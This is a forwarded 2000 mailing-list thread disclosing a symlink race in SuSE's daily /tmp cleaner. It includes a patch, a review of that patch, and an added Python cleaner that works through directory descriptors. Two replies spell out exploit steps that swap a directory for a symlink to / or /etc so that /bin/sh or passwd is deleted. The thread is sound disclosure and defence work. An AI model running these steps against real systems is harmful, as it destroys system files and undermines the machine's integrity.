Excuse me, please! It seems that my little patch was not such a good
idea! So, thanks to Pavel Kankovsky and to James Antill!
Peter
--
Peter Münster
http://gmv.spm.univ-rennes1.fr/~peter/
---------- Forwarded message ----------
Date: Sun, 23 Apr 2000 00:03:04 +0200
From: Pavel Kankovsky
If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local user can delete arbitrary files by doing some commands like these: mkdir -p "/tmp/hhh /somedirectory" touch -t some-early-date "/tmp/hhh /somedirectory/somefile" sleep 1d ... Here a possible patch for suse-package aaa_base-2000.1.3-0: ... + find $TMP_DIR/. $OMIT ! -type d \ + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';' + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \ + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'
mkdir -p /tmp/somedirectory/{_junk,bin}
fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk
find /tmp/somedirectory -type f | xargs touch -t some-early-date
touch -t some-early-date /tmp/somedirectory/bin/sh
wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk
mv /tmp/somedirectory /tmp/somedirectory2
ln -s / /tmp/somedirectory
watch /bin/sh disappear...this will teach you not to use find and
rm to clean /tmp :)
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
---------- Forwarded message ----------
Date: 21 Apr 2000 16:20:24 -0400
From: James Antill
Hello,
If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local user can delete arbitrary files by doing some commands like these:
mkdir -p "/tmp/hhh /somedirectory"
touch -t some-early-date "/tmp/hhh /somedirectory/somefile"
sleep 1d
The bug is in /etc/cron.daily/aaa_base for SuSE version 6.3 or perhaps also in /root/bin/cron.daily for older SuSE versions. Tested on SuSE 6.0 and 6.3 but probably existent on earlier versions.
Here is a possible patch for suse-package aaa_base-2000.1.3-0:
--- aaa_base~ Mon Jan 3 18:16:55 2000 +++ aaa_base Fri Apr 21 08:42:19 2000 @@ -158,20 +158,10 @@ done
for TMP_DIR in $TMP_DIRS_TO_CLEAR ; do - for DEL_FILE in `find $TMP_DIR/. $OMIT \( -type f -o -type l \) \ - -atime +$MAX_DAYS_IN_TMP | sort -r` ; do - rm -f $DEL_FILE - DEL_DIR=`dirname $DEL_FILE` - if [ "$DEL_DIR" != "$TMP_DIR/." ] ; then - rmdir $DEL_DIR 2> /dev/null - fi - done - done
Oh dear :O ... apart from the above flaw (--print0 anyone) above this is _very_ raceable by doing...
mkdir -p /tmp/blah/1
mkdir -p /tmp/blah/2
mkdir -p /tmp/blah/3
Do the above a couple of thousand times...
touch /tmp/blah/199/passwd
wait for the find part of the script to come along...
mv /tmp/blah/199 /tmp/blah/.199 && ln -s /etc /tmp/blah/199
- for DEL_DIR in `find $TMP_DIR/. $OMIT \( -type d \) \ - -ctime +$MAX_DAYS_IN_TMP | sort -r` ; do - if [ "$DEL_DIR" != "$TMP_DIR/." ] ; then - rmdir $DEL_DIR 2> /dev/null - fi + find $TMP_DIR/. $OMIT ! -type d \ + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';' + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \ + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';' done fi
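Review bot: the added find lines still pass a full pathname to rm -f and rmdir through -exec '{}', so every directory component is resolved again at deletion time, after find has already tested the entry. The '{}' form does stop the whitespace splitting that the removed backtick loops suffered from, but a directory under $TMP_DIR that is replaced by a symlink between the test and the unlink still redirects the delete outside the tree. Suggest -execdir, which runs the command from the directory containing the matched entry, or a cleaner that works relative to open directory descriptors. Separately, -mindepth 1 in the second find is a global option and belongs before -type d -empty; GNU find warns when it follows a test.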
This doesn't fix it either, it just makes the race smaller.
--
James Antill -- james@and.org
"If we can't keep this sort of thing out of the kernel, we might as well pack it up and go run Solaris." -- Larry McVoy.
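Both replies come down to the same thing: rm and rmdir receive a full path that is resolved again after find has tested it. As an added example (not part of the thread and not SuSE's code), here is a cleaner that pins each directory by file descriptor and deletes by name relative to it. `reap`, `demo` and the constructed tree are illustrative names, and Linux `dir_fd` support in Python's `os` module is assumed.

```python
import os, stat, tempfile, time

NOFOLLOW_DIR = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW

def reap(dir_fd, cutoff):
    """Remove entries under the open directory dir_fd that are older than
    cutoff (atime for non-directories, mtime for directories, as in the
    patch). Returns the relative names removed."""
    removed = []
    for name in os.listdir(dir_fd):
        try:
            st = os.stat(name, dir_fd=dir_fd, follow_symlinks=False)
            if stat.S_ISDIR(st.st_mode):
                # O_NOFOLLOW fails if the name was swapped for a symlink
                fd = os.open(name, NOFOLLOW_DIR, dir_fd=dir_fd)
                try:
                    removed += [f"{name}/{r}" for r in reap(fd, cutoff)]
                finally:
                    os.close(fd)
                if st.st_mtime < cutoff:
                    os.rmdir(name, dir_fd=dir_fd)  # fails unless empty
                    removed.append(name)
            elif st.st_atime < cutoff:
                # unlinkat(): acts on this directory's entry, never follows it
                os.unlink(name, dir_fd=dir_fd)
                removed.append(name)
        except OSError:
            continue  # vanished, swapped, or not empty: skip, never follow
    return removed

def demo():
    """Constructed tree: an old file, a fresh file, an old nested file and
    an old symlink pointing at a directory outside the tree."""
    base = tempfile.mkdtemp()
    tmp, outside = os.path.join(base, "tmp"), os.path.join(base, "etc")
    os.makedirs(os.path.join(tmp, "sub"))
    os.mkdir(outside)
    for p in ("tmp/old.txt", "tmp/sub/old2.txt", "tmp/fresh.txt", "etc/passwd"):
        open(os.path.join(base, p), "w").close()
        if "fresh" not in p:
            os.utime(os.path.join(base, p), (0, 0))  # 1970 timestamps
    os.symlink(outside, os.path.join(tmp, "link"))
    os.utime(os.path.join(tmp, "link"), (0, 0), follow_symlinks=False)
    fd = os.open(tmp, NOFOLLOW_DIR)
    try:
        removed = reap(fd, time.time() - 86400)
    finally:
        os.close(fd)
    return sorted(removed), os.path.exists(os.path.join(outside, "passwd"))
```

The symlink itself is removed as a stale entry, while the file it points to outside the tree is left alone because no path is ever re-resolved through it.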